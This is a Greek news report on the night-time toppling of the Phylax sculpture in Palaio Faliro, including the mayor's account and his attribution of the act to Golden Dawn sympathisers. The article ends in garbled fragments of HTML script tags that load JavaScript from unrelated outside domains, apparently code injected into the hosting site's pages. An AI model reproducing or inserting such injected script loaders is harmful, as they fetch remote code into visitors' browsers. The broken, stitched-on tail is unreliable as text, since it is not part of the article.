Κατεδαφίστηκε ο Phylax, σκοταδιστές καταγγέλλει ο δήμαρχος

Ανθρώπινα χέρια και όχι οι άνεμοι κατεδάφισαν τον κόκκινο «έκπτωτο άγγελο», καταγγέλλει ο δήμαρχος Παλαιού Φαλήρου, Διονύσης Χατζηδάκης, και κάνει λόγο για σκοταδισμό σε όλο του το μεγαλείο.

Όπως δήλωσε ο δήμαρχος (Real Fm), «γύρω στις 3:30 ήρθαν με ένα τεράστιο φορτηγό και δύο τζιπ, με κουκούλες, έριξαν σχοινιά στο γλυπτό, το τράβηξαν και έπεσε κάτω και, όπως καταλαβαίνετε, έσπασαν τα φτερά του… Το παρακράτος! Είπαν στον άνθρωπο στην καντίνα, αν ειδοποιήσεις την αστυνομία ή τον δήμαρχο θα σου κάψουμε την καντίνα. Μόλις με ειδοποίησε, έφυγε κατευθείαν για κάτω, αλλά δυστυχώς είχαν βγάλει τις πινακίδες. Ο σκοταδισμός στο μεγαλείο του».

«Αυτές τις μαγκιές ξέρω ποιοι τις κάνουν. Έχω ενδείξεις ότι είναι χρυσαυγίτες», πρόσθεσε.

Το γλυπτό Phylax του εικαστικού Κωστή Γεωργίου, που τοποθετήθηκε στις 15 Δεκεμβρίου μεταξύ των εκκλησιών Αγίας Σκέπης και Αγίου Γεωργίου, επί της παλαιάς λεωφόρου Ποσειδώνος, έχει ξεσηκώσει θύελλα αντιδράσεων για την ιδιαίτερη μορφή του.

Θυμίζουμε ότι την Τετάρτη 27 Δεκεμβρίου άγνωστοι πέταξαν λευκή μπογιά στο γλυπτό, ενώ τα ξημερώματα της Τετάρτης 6 Ιανουαρίου άγνωστοι κατέβηκαν από αυτοκίνητο χωρίς πινακίδες, έδεσαν ένα σκοινί γύρω από το γλυπτό και επιχείρησαν να το γκρεμίσουν τραβώντας το με τη βοήθεια του οχήματος.

Γρήγορα, όμως, έγιναν αντιληπτοί από κατοίκους της περιοχής και τράπηκαν σε φυγή.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>